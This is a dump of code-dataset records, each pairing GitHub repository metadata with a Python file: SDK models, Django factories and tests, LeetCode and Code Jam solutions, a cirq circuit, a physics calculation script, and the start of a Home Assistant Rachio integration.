] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class NodePort(object):
"""Implementation of the 'NodePort' model.
VmInfo specifies information of a NodePort per service and port
combination within an application instance.
Attributes:
is_ui_port (bool): TODO: type description here.
port (int): TODO: type description here.
tag (TagEnum): Specifies use of the nodeport kDefault - No specific
service. kHttp - HTTP server. kHttps - Secure HTTP server. kSsh -
Secure shell server.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_ui_port":'isUiPort',
"port":'port',
"tag":'tag'
}
def __init__(self,
is_ui_port=None,
port=None,
tag=None):
"""Constructor for the NodePort class"""
# Initialize members of the class
self.is_ui_port = is_ui_port
self.port = port
self.tag = tag
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_ui_port = dictionary.get('isUiPort')
port = dictionary.get('port')
tag = dictionary.get('tag')
# Return an object of this model
return cls(is_ui_port,
port,
tag)
| [
"[email protected]"
] | |
8cc261eb0ecfb093323305bc3cc656d8b5205b78 | a6c13fb257563d99c45f79b2fee5c2f2f76251ef | /apps/common/factories.py | 197597ddc5ded9aea5a8f9bfe7315a01f742e943 | [] | no_license | sipanmargaryan/addproduct | 9999cdf9b611ea4f103ed9e58e24c8fc8fe0e3fb | 9232c31956f154f3c4349fe3942a331559213c70 | refs/heads/master | 2022-11-05T19:23:37.209482 | 2020-06-26T14:44:45 | 2020-06-26T14:44:45 | 275,178,682 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | import factory
from django.utils import timezone
import common.models
class ArticleFactory(factory.DjangoModelFactory):
title = factory.Sequence(lambda n: 'help text title-{}'.format(n))
description = factory.Sequence(lambda n: 'help text description-{}'.format(n))
class Meta:
model = common.models.Article
class CategoryFactory(factory.DjangoModelFactory):
name = factory.Sequence(lambda n: 'category-{}'.format(n))
class Meta:
model = common.models.Category
class ServiceFactory(factory.DjangoModelFactory):
opening_time = factory.lazy_attribute(lambda x: timezone.now())
closing_time = factory.lazy_attribute(lambda x: timezone.now())
category = factory.SubFactory(CategoryFactory)
class Meta:
model = common.models.Service
| [
"[email protected]"
] | |
d765931611ffb0b15f7c1c88acfd00e0ac6f9f19 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/669.py | bd702b9e219525f76c3fa85711b680bca73aa591 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | #!/usr/bin/env python
import sys
import struct
import ctypes
def binary(num):
return ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', num))
T = int(sys.stdin.readline())
for case in range(0, T):
part = sys.stdin.readline()
up, down = part.split("/")
up = int(up)
down = int(down)
if int(bin(up&down)[2:]) != 0:
print "Case #%s: impossible" % (str(case+1) )
else:
for i in range(1, 40):
up = 2*up
if up >= down:
print "Case #%s: %d" % (str(case+1), i )
break
| [
"[email protected]"
] | |
559e9d1a9a1c37ba4f8aae45a6b1828a164fe7ce | b685036280331fa50fcd87f269521342ec1b437b | /src/tests/demo_5.py | c5de86e214fd5babcc1639e86f60c6ee47de9df4 | [] | no_license | chenqing666/myML_DM_Test | f875cb5b2a92e81bc3de2a0070c0185b7eacac89 | 5ac38f7872d94ca7cedd4f5057bb93732b5edbad | refs/heads/master | 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py |
def fib(times):
n = 0
a,b = 0, 1
while n < times:
yield b
a, b = b, a + b
n += 1
return "done"
g = fib(2)
next(g)
next(g)
# next(g) | [
"[email protected]"
] | |
bd74a3ab41b48ffe8069d7327a2c0494179fcbfe | fcde32709c62b8ee86da459bb7c8eee52c848118 | /code/day03/r4.py | 37ad4deb38ed39591d4c123e94a810e47614be79 | [] | no_license | klaus2015/py_base | 6b92d362c3d7dc0e09205a037f4d580381dac94d | ec32c731c1c2f6a0dab87f1d167397e4fa86b8de | refs/heads/master | 2022-07-28T15:49:30.383648 | 2020-05-11T15:31:43 | 2020-05-11T15:31:43 | 261,777,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | # state = None
# number = int(input("请输入一个整数: "))
# if number % 2 :
# state = "奇数"
# else:
# state = "偶数"
# print(state)
# state = "奇数" if int(input("请输入整数: ")) % 2 else "偶数"
# print(state)
year = int(input("请输入年份:"))
result = year % 4 == 0 and year % 100 != 0 or year % 400 == 0
if result:
day = 29
else:
day = 28
print(day)
代码简单,但是可读性差 能被4整除但是不能被100整除,或者可以被400整除
day = 29 if not year % 4 and year % 100 or not year % 400 else 28
day = 29 if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else 28
result = year % 4
print(result)
year = 2000
result = year % 4
print(result) | [
"[email protected]"
] | |
a4b9d93d338391843fa18a38fd30a88d04acb569 | e0ede722874d222a789411070f76b50026bbe3d8 | /practice/solution/0894_all_possible_full_binary_trees.py | 2727423a40a633641a8545b0f9ac6da90888a70d | [] | no_license | kesarb/leetcode-summary-python | cd67456cb57bdff7ee227dab3930aaf9c2a6ad00 | dc45210cb2cc50bfefd8c21c865e6ee2163a022a | refs/heads/master | 2023-05-26T06:07:25.943854 | 2021-06-06T20:02:13 | 2021-06-06T20:02:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
def allPossibleFBT(self, N):
"""
:type N: int
:rtype: List[TreeNode]
"""
self.value_dict = {1: [TreeNode(0)]}
self.res = 0
self.res = self.dfs(N)
return self.res
def dfs(self, N):
temp_list = []
if N in self.value_dict:
temp_list = self.value_dict[N]
return temp_list
for i in range(1, N, 2):
for left in self.dfs(i):
for right in self.dfs(N - 1 - i):
root = TreeNode(0)
root.left = left
root.right = right
temp_list.append(root)
self.value_dict[N] = temp_list
return temp_list | [
"[email protected]"
] | |
b67726927a44da27cddb100768d5532598314c80 | 038af1bfd275530413a7b4e28bf0e40eddf632c6 | /parsifal/apps/accounts/tests/test_update_emails_view.py | 6e3b2e07623eb93ac58bb135d2b97b941ee0e58f | [
"MIT"
] | permissive | vitorfs/parsifal | 5c5345ff75b48c5596977c8e0a9c4c537ed4726c | 68c3ce3623a210a9c649a27f9d21ae6130541ea9 | refs/heads/dev | 2023-05-24T16:34:31.899776 | 2022-08-14T16:30:06 | 2022-08-14T16:30:06 | 11,648,402 | 410 | 223 | MIT | 2023-05-22T10:47:20 | 2013-07-25T00:27:21 | Python | UTF-8 | Python | false | false | 2,130 | py | from django.test.testcases import TestCase
from django.urls import reverse
from parsifal.apps.authentication.tests.factories import UserFactory
from parsifal.utils.test import login_redirect_url
class TestUpdateEmailsViewView(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(email="[email protected]")
cls.url = reverse("settings:emails")
def test_login_required(self):
response = self.client.get(self.url)
self.assertRedirects(response, login_redirect_url(self.url))
def test_get_success(self):
self.client.force_login(self.user)
response = self.client.get(self.url)
with self.subTest(msg="Test get status code"):
self.assertEqual(200, response.status_code)
parts = ("csrfmiddlewaretoken", "email", "[email protected]")
for part in parts:
with self.subTest(msg="Test response body", part=part):
self.assertContains(response, part)
def test_post_success(self):
data = {
"email": "[email protected]",
}
self.client.force_login(self.user)
response = self.client.post(self.url, data, follow=True)
with self.subTest(msg="Test post status code"):
self.assertEqual(302, response.redirect_chain[0][1])
with self.subTest(msg="Test post redirect status code"):
self.assertEqual(200, response.status_code)
with self.subTest(msg="Test success message"):
self.assertContains(response, "Account email was updated with success!")
with self.subTest(msg="Test form saved data"):
self.assertContains(response, 'value="[email protected]"')
def test_post_fail(self):
data = {"email": "invalidemail"}
self.client.force_login(self.user)
response = self.client.post(self.url, data)
with self.subTest(msg="Test post status code"):
self.assertEqual(200, response.status_code)
with self.subTest(msg="Test error message"):
self.assertContains(response, "Enter a valid email address.")
| [
"[email protected]"
] | |
b9fd420ff9cb37198ef9d9d480d07225dc750a1b | 839d8d7ccfa54d046e22e31a2c6e86a520ee0fb5 | /icore/base/list/dict_test.py | b6745b165a751dc40e63e211eac910f10f6e658e | [] | no_license | Erich6917/python_corepython | 7b584dda737ef914780decca5dd401aa33328af5 | 0176c9be2684b838cf9613db40a45af213fa20d1 | refs/heads/master | 2023-02-11T12:46:31.789212 | 2021-01-05T06:21:24 | 2021-01-05T06:21:24 | 102,881,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | # -*- coding: utf-8 -*-
# @Time : 2017/12/26
# @Author : LIYUAN134
# @File : dict_test.py
# @Commment:
#
import dict as dict
def test1():
# dict.dict_mulkeys()
dict.dict_cal()
test1()
| [
"[email protected]"
] | |
387a2c4e876cb2a1a446a27a40b003870afa741b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/cirq_new/cirq_program/startCirq_noisy175.py | cc4f8f2ea5639c20ee3b44f313ca868e0ad2a42c | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=14
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=6
c.append(cirq.H.on(input_qubit[0])) # number=11
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0])) # number=12
c.append(cirq.H.on(input_qubit[0])) # number=13
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=8
c.append(cirq.X.on(input_qubit[0])) # number=9
c.append(cirq.X.on(input_qubit[0])) # number=10
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
circuit = circuit.with_noise(cirq.depolarize(p=0.01))
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_noisy175.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
099e40f30702743bcd8c7b03996405b18971a5e5 | 84297380d00453e71f65c591dca046bd41a32184 | /ABC/ABC113/A.py | c367158a2dbe77733d419a9117215295220f221d | [] | no_license | daiki1998/atcoder | a5ef25245b1bbc3a5e33044846a3c16213603bd3 | d864a7cb11e41dbf6a691f5d128fdfe122b07046 | refs/heads/main | 2023-03-06T22:55:29.863716 | 2021-02-18T12:01:24 | 2021-02-18T12:01:24 | 323,401,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | x, y = map(int, input().split())
print(x+y//2) | [
"[email protected]"
] | |
2f53b3f8271b60d22df54f72752eded981080e61 | b697f5d8e441328c2deee1bb5853d80710ae9873 | /617.合并二叉树.py | 5d35a8098ff5d6b1d6488a23bbd84ef8e3088d55 | [] | no_license | happy-luck/LeetCode-python | d06b0f6cf7bad4754e96e6a160e3a8fc495c0f95 | 63fc5a1f6e903a901ba799e77a2ee9df2b05543a | refs/heads/master | 2021-03-22T16:12:52.097329 | 2020-07-15T13:48:37 | 2020-07-15T13:48:37 | 247,381,313 | 0 | 0 | null | 2020-03-15T01:47:42 | 2020-03-15T01:28:38 | null | UTF-8 | Python | false | false | 2,281 | py | 方法一:递归
我们可以对这两棵树同时进行前序遍历,并将对应的节点进行合并。在遍历时,如果两棵树的当前节点均不为空,我们就将它们的值进行相加,并对它们的左孩子和右孩子进行递归合并;如果其中有一棵树为空,那么我们返回另一颗树作为结果;如果两棵树均为空,此时返回任意一棵树均可(因为都是空)。
class Solution:
def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:
if t2==None:
return t1
if t1==None:
return t2
t1.val += t2.val
t1.left = self.mergeTrees(t1.left,t2.left)
t1.right = self.mergeTrees(t1.right,t2.right)
return t1
时间复杂度:O(N),其中 N 是两棵树中节点个数的较小值。
空间复杂度:O(N),在最坏情况下,会递归 N 层,需要 O(N) 的栈空间。
方法二:迭代
我们首先把两棵树的根节点入栈,栈中的每个元素都会存放两个根节点,并且栈顶的元素表示当前需要处理的节点。在迭代的每一步中,我们取出栈顶的元素并把它移出栈,并将它们的值相加。随后我们分别考虑这两个节点的左孩子和右孩子,如果两个节点都有左孩子,那么就将左孩子入栈;如果只有一个节点有左孩子,那么将其作为第一个节点的左孩子;如果都没有左孩子,那么不用做任何事情。对于右孩子同理。
class Solution:
def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:
if t2==None:
return t1
if t1==None:
return t2
stack = [(t1,t2)]
while stack:
t = stack.pop(0)
if t[1]==None:
continue
t[0].val += t[1].val
if(t[0].left==None):
t[0].left = t[1].left
else:
stack.append((t[0].left,t[1].left))
if(t[0].right==None):
t[0].right = t[1].right
else:
stack.append((t[0].right,t[1].right))
return t1
时间复杂度:O(N),其中 N 是两棵树中节点个数的较小值。
空间复杂度:O(N),在最坏情况下,栈中会存放 N 个节点。
| [
"[email protected]"
] | |
d90dcbcb06450d0cec154190b117b2ccce514085 | bce41eff7da75522f58d831251e1ed95d8809585 | /services/web/project/apps/event/subscriptions/eventUpdateSubscription.py | 88e5ae15e2e558fd56fb9935803408b5065f7dcb | [] | no_license | javillarreal/eventuality | be9728a19caef8c19d3d40e6dd5b90e57b5b63a1 | 5a543a9e6b5a3f014b670297e22f52a9884af4bb | refs/heads/master | 2021-07-03T18:55:33.037863 | 2021-06-24T03:24:38 | 2021-06-24T03:24:38 | 204,239,198 | 1 | 0 | null | 2020-11-27T02:39:19 | 2019-08-25T03:05:17 | Python | UTF-8 | Python | false | false | 696 | py | import random
import graphene
from rx import Observable
class RandomType(graphene.ObjectType):
seconds = graphene.Int()
random_int = graphene.Int()
class Subscription(graphene.ObjectType):
count_seconds = graphene.Int(up_to=graphene.Int())
random_int = graphene.Field(RandomType)
def resolve_count_seconds(root, info, up_to=5):
return Observable.interval(1000)\
.map(lambda i: "{0}".format(i))\
.take_while(lambda i: int(i) <= up_to)
def resolve_random_int(root, info):
return Observable.interval(1000).map(lambda i: RandomType(seconds=i, random_int=random.randint(0, 500)))
| [
"[email protected]"
] | |
c87f6abacd4d1526c188c591e69870c485175606 | f67e9154c3e077eaad349f85439d88820098a6fc | /Search/017_LetterCombOfPhoneNum.py | 73ba53f513b92e34b6a16b00c4aef98076aeab44 | [] | no_license | pondjames007/CodingPractice | 0c159ae528d1e595df0f0a901ee1ab4dd8925a14 | fb53fea229ac5a4d5ebce23216afaf7dc7214014 | refs/heads/master | 2020-06-08T02:31:04.569375 | 2020-01-15T20:41:34 | 2020-01-15T20:41:34 | 193,142,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | # TIPS:
# make a dictionary to map digit and char
# go through all digits and find out all combinations
class Solution:
def letterCombinations(self, digits: str) -> List[str]:
if not digits: return []
n_to_c = {}
char = [*string.ascii_lowercase]
start = 0
end = 0
for i in range(2,10):
start = end
if i == 7 or i == 9:
end += 4
else:
end += 3
n_to_c[i] = char[start:end]
ans = []
self.lookup(n_to_c, digits, [], ans)
return ans
def lookup(self, dic, digits, path, ans):
if not digits:
ans.append(''.join(path))
return
for c in dic[int(digits[0])]:
self.lookup(dic, digits[1:], path + [c], ans) | [
"[email protected]"
] | |
abe0955e886d8fbc9de7f3e7ad550af81be6cedb | 5a07828016e8bafbea5dac8f83c8bfd5d0bfd603 | /py_290w290/140304_srw_output.py | 94f032f09c22370f14899c0b9c40b25777fbe84a | [] | no_license | JJHopkins/rajter_compare | db5b88d2c6c1efc0fead9b6ed40fb3cce36bedb4 | 2ba52f4f16cf2aca350a82ea58d0aa8f8866c47c | refs/heads/master | 2020-06-04T23:53:57.089329 | 2014-04-08T18:02:30 | 2014-04-08T18:02:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | #$ {\bf Free energy between two skewed cylinders (CG-10 in water). Full retarded result, function of separation $\ell$ and angle $\theta$} \\
#$ Equation 12: $G(\ell,\theta) = - \frac{ (\pi R_1^{2})(\pi R_2^{2}) }{2 \pi~\ell^{4} \sin{\theta}} \left( {\cal A}^{(0)}(\ell) + {\cal A}^{(2)}(\ell) \cos 2\theta \right)$ \\
#$ $G(\ell,\theta) = - \frac{k_BT}{64 \pi} \frac{ \pi^2 R_1^{2} R_2^{2} }{\ell^{4} \sin{\theta}} {\sum_{n=0}^{\infty}}' \Delta_{1,\parallel} \Delta_{2,\parallel} ~p_n^{4} ~\int_0^{\infty} t dt ~\frac{e^{- 2 p_n \sqrt{t^{2} + 1}}}{(t^{2} + 1)} \tilde g(t, a_1(i \omega_n), a_2(i \omega_n), \theta),$ \\
#$ with $\tilde g(t, a_1, a_2, \theta) &=& 2 \left[ (1+3a_1)(1+3a_2) t^{4} + 2 (1+2a_1+2a_2+3a_1a_2) t^{2} + 2(1+a_1)(1+a_2)\right] + \nonumber \\
#$ & & ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + (1-a_1)(1-a_2)(t^{2} + 2)^2 \cos 2\theta.$ \\
#!/usr/bin/python
import numpy as np
import scipy.optimize as opt
from scipy.integrate import trapz
import matplotlib.pyplot as pl
from matplotlib import axis as ax
# use pyreport -l file.py
from pylab import show
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from pylab import pause
from matplotlib.backends.backend_pdf import PdfPages
pp = PdfPages('plots/skew_ret_water/skew_ret_water.pdf')
eiz_x = np.loadtxt('data/eiz_x_output_eV.txt') #perpendicular, radial
eiz_y = np.loadtxt('data/eiz_y_output_eV.txt')
eiz_z = np.loadtxt('data/eiz_z_output_eV.txt') # parallel,axial
#eiz_w = 1.0 + np.zeros(len(eiz_z))
eiz_w = np.loadtxt('data/eiz_w_output_eV.txt') # water as intervening medium
eiz_w[0] = eiz_w[1] #NOTE: there is a jump from first val down to second val
r_1 = 1.0e-9
r_2 = 1.0e-9
c = 2.99e8 # in m/s
T = 297
kb = 1.3807e-23 # in J/K
coeff = 2.411e14 # in rad/s
# NOTES:
# at RT, 1 kT = 4.11e-21 J
# 1 eV = 1.602e-19 J = 0.016 zJ
# h_bar_eV = 6.5821e-16 eVs
# h_bar = 1. #1.0546e-34 #in Js
#kb = 8.6173e-5 # in eV/K
# z_n_eV = (2*pi*kT/h_bar)n
# = (0.159 eV) / (6.5821e-16 eVs)
# = n*2.411e14 rad/s
# z_n_J = (2*pi*kT/h_bar)n
# = (1.3807e-23 J/K) / (1.0546e-34 Js))*n
# = n*2.411e14 rad/s
#coeff = 0.159 # in eV w/o 1/h_bar
ns = np.arange(0.,500.)
z = ns * coeff
ls = np.linspace(1.0e-9, 1.0e-6, 200)
#thetas = np.linspace((0.01)*np.pi,(1./2)*np.pi,25)
thetas = [np.pi/8,np.pi/4,np.pi/3,np.pi/2]
dt = 1.0
ts = np.arange(1.0,10000.,dt)
def Aiz(perp, par,med):
return (2.0*(perp-med)*med)/((perp+med)*(par-med))
def ys(a,time,eizw,L, N):
term0 = ( time / (time*time+1.0) )
term1 = ( time**4 * 2.0*(1. + 3.*a)*(1.+3.*a) )
term2 = ( time**2 * 4.0*(1. + 2.0*a+2.0*a+3.0*a*a))
term3 = ( 4.0*(1. + a)*(1.0 + a) )
term4 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'ys term0', term0
#print 'ys term1', term1
#print 'ys term2', term2
#print 'ys term3', term3
#print 'ys term4', term4
#print '----'
return (term0) * np.exp(term4)*( (term1) + (term2) + (term3))#* term5
def y_2s(a,time,eizw, L, N):
term0 = (time / (time*time+1.0) )
term1 = ((1.- a)*(1.- a)*(time * time + 2.0)*(time * time + 2.0))
term2 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'y_2s term0', term0
#print 'y_2s term1', term1
#print 'y_2s term2', term2
#print '----'
return term0 * term1* np.exp(term2) #* term3
def As(eizz,eizw,L,N,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'As term1 = ', term1
#print 'As term2 = ', term2
##print 'As term3 = ', term3
#print '----'
return term1 * term2# * term3
def A_2s(eizz,eizw, L , N ,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'A_2s term1 = ', term1
#print 'A_2s term2 = ', term2
##print 'A_2s term3 = ', term3
#print '----'
return (term1 * term2)# * term3
y = np.zeros(shape=(len(ns),len(ls)))
y_2 = np.zeros(shape=(len(ns),len(ls)))
A = np.zeros(shape=(len(ns),len(ls)))
A_2 = np.zeros(shape=(len(ns),len(ls)))
EL = np.zeros(len(ls))
G_l_t_dt = np.zeros(shape=(len(ls),len(thetas)))
aiz = []
aiz = Aiz(eiz_x,eiz_z, eiz_w) # of length = len(ns)
for k,length in enumerate(ls):
sum_A = np.empty(len(ls))
sum_A_2 = np.empty(len(ls))
for j,n in enumerate(ns):
# Integral:
y[j,k] = trapz(ys(aiz[j],ts,eiz_w[j],length,n),ts,dt)
y_2[j,k] = trapz(y_2s(aiz[j],ts,eiz_w[j],length,n),ts,dt)
#print 'dt Integral y = ',i,k,j, y
#print 'dt Integral y_2 = ',i,k,j, y_2
#print '----'
#print 'N terms for A0 = ' , As(eiz_z[j],eiz_w[j],length,n,y)
#print 'N terms for A2 = ', A_2s(eiz_z[j],eiz_w[j],length,n,y_2)
#print '----'
A[j,k] = As(eiz_z[j],eiz_w[j],length,n,y[j,k])
A_2[j,k] = A_2s(eiz_z[j],eiz_w[j],length,n,y_2[j,k])# * np.cos(2.0*theta)
A[0] = (1./2)*A[0]
A_2[0] = (1./2)*A_2[0]
sum_A = np.sum(A,axis=0)
#print 'sum of A0 = ', k,j,sum_A
sum_A_2 = np.sum(A_2,axis=0)
#print 'sum of A2 = ', k,j,sum_A_2
#print '----'
#print 'shape sum_A_2 = ', np.shape(sum_A_2)
#sys.exit()
for k,length in enumerate(ls):
for i, theta in enumerate(thetas):
EL[k] = 1./(length*length*length*length)
G_l_t_dt[k,i] = (1.602e-19 / 4.11e-21) * (1./32) * EL[k]*np.pi*r_1*r_1*r_2*r_2*(sum_A[k] + sum_A_2[k]* np.cos(2.0*theta) )/(2.0*np.sin(theta))# (1e21)*
np.savetxt('compare/srw_min_thetas.txt',G_l_t_dt)
pl.figure()
pl.loglog(ls,(kb*T/32)*sum_A,'b-', label = r'$\mathcal{A^{(0)}}$')
pl.loglog(ls,(kb*T/32)*sum_A_2,'b--', label = r'$\mathcal{A^{(2)}}$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[m]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'upper right')
pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.savefig('plots/skew_ret_water/skew_ret_water_A0_A2.pdf')
show()
ls4 = 1e9*ls[ 2]#2]
ls5 = 1e9*ls[12]#4]
ls6 = 1e9*ls[22]#6]
ls1 = 1e9*ls[32]#8]
ls2 = 1e9*ls[42]#12]
ls3 = 1e9*ls[52]#16]
fig = pl.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#pl.semilogy(thetas, G_l_t_dt)
ax.semilogy(thetas, G_l_t_dt[ 2,:], label = r'$\ell$ = %1.2f nm' %ls4)
ax.semilogy(thetas, G_l_t_dt[12,:], label = r'$\ell$ = %1.2f nm' %ls5)
ax.semilogy(thetas, G_l_t_dt[22,:], label = r'$\ell$ = %1.2f nm' %ls6)
ax.semilogy(thetas, G_l_t_dt[32,:], label = r'$\ell$ = %1.2f nm' %ls1)
ax.semilogy(thetas, G_l_t_dt[42,:], label = r'$\ell$ = %1.2f nm' %ls2)
ax.semilogy(thetas, G_l_t_dt[52,:], label = r'$\ell$ = %1.2f nm' %ls3)
#ax.semilogy(0,0,'', label = r'$G_\theta = cos(2\theta)/2sin(\theta)$')
pl.xlabel(r'$Angle\,\,\mathrm{[radians]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
pl.axis([0,1.7,1e-10,1.0])
#pl.axis([0,1.7,1e-3,1e4])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,angle:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'lower left')
#pl.savefig('plots/skew_ret_water/skew_ret_water_G_vs_theta.pdf')
#show()
pl.savefig('plots/skew_ret_water/G_vs_theta_fixed_l.pdf')
show()
pl.figure()
pl.loglog(ls, G_l_t_dt)#, label = labels[i])
#pl.loglog(ls, G_l_t_dt[:,3], label = r'$\theta = \pi/4$')
#pl.loglog(ls, G_l_t_dt[:,4], label = r'$\theta = \pi/3$')
#pl.loglog(ls, G_l_t_dt[:,6], label = r'$\theta = \pi/2$')
pl.xlabel(r'$Separation,\,\ell\,\,\mathrm{[m]}$', size = 20)
pl.ylabel(r'$-G(\ell,\theta)\,\,\mathrm{[k_{B}T]}$', size = 20)
pl.axis([1.0e-9, 1.0e-6,1e-16,1e3])
#pl.axis([1.0e-9, 1.0e-6,1e-3,1e3])
#pl.title(r'$\mathrm{-G(\ell,\theta)\,vs.\,separation:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'best')
pl.savefig('plots/compare/skew_ret_water_G_vs_l.pdf')
show()
| [
"[email protected]"
] | |
37694eb9518f87e68f56b733a3fbd604c4eddd79 | 11ad104b0309a2bffd7537d05e2ab3eaf4aed0ca | /homeassistant/components/rachio/device.py | 9d7c30579394412becf75ff8253ffd54c62cc51b | [
"Apache-2.0"
] | permissive | koying/home-assistant | 15e5d01a45fd4373b3d286e1b2ca5aba1311786d | 9fc92ab04e0d1933cc23e89b4095714aee725f8b | refs/heads/dev | 2023-06-24T01:15:12.150720 | 2020-11-01T12:27:33 | 2020-11-01T12:27:33 | 189,232,923 | 2 | 1 | Apache-2.0 | 2023-01-13T06:04:15 | 2019-05-29T13:39:02 | Python | UTF-8 | Python | false | false | 6,956 | py | """Adapter to wrap the rachiopy api for home assistant."""
import logging
from typing import Optional
from homeassistant.const import EVENT_HOMEASSISTANT_STOP, HTTP_OK
from .const import (
KEY_DEVICES,
KEY_ENABLED,
KEY_EXTERNAL_ID,
KEY_FLEX_SCHEDULES,
KEY_ID,
KEY_MAC_ADDRESS,
KEY_MODEL,
KEY_NAME,
KEY_SCHEDULES,
KEY_SERIAL_NUMBER,
KEY_STATUS,
KEY_USERNAME,
KEY_ZONES,
)
from .webhooks import LISTEN_EVENT_TYPES, WEBHOOK_CONST_ID
_LOGGER = logging.getLogger(__name__)
class RachioPerson:
    """Represent a Rachio user account and the controllers it owns."""
    def __init__(self, rachio, config_entry):
        """Create an object from the provided API instance."""
        # Use API token to get user ID
        self.rachio = rachio
        self.config_entry = config_entry
        self.username = None
        self._id = None
        self._controllers = []
    def setup(self, hass):
        """Fetch account info from the Rachio API and register each controller."""
        # API responses are (headers, payload) pairs here: index 0 carries the
        # HTTP status, index 1 the decoded body.
        response = self.rachio.person.info()
        assert int(response[0][KEY_STATUS]) == HTTP_OK, "API key error"
        self._id = response[1][KEY_ID]
        # Use user ID to get user data
        data = self.rachio.person.get(self._id)
        assert int(data[0][KEY_STATUS]) == HTTP_OK, "User ID error"
        self.username = data[1][KEY_USERNAME]
        devices = data[1][KEY_DEVICES]
        for controller in devices:
            webhooks = self.rachio.notification.get_device_webhook(controller[KEY_ID])[
                1
            ]
            # The API does not provide a way to tell if a controller is shared
            # or if they are the owner. To work around this problem we fetch the webooks
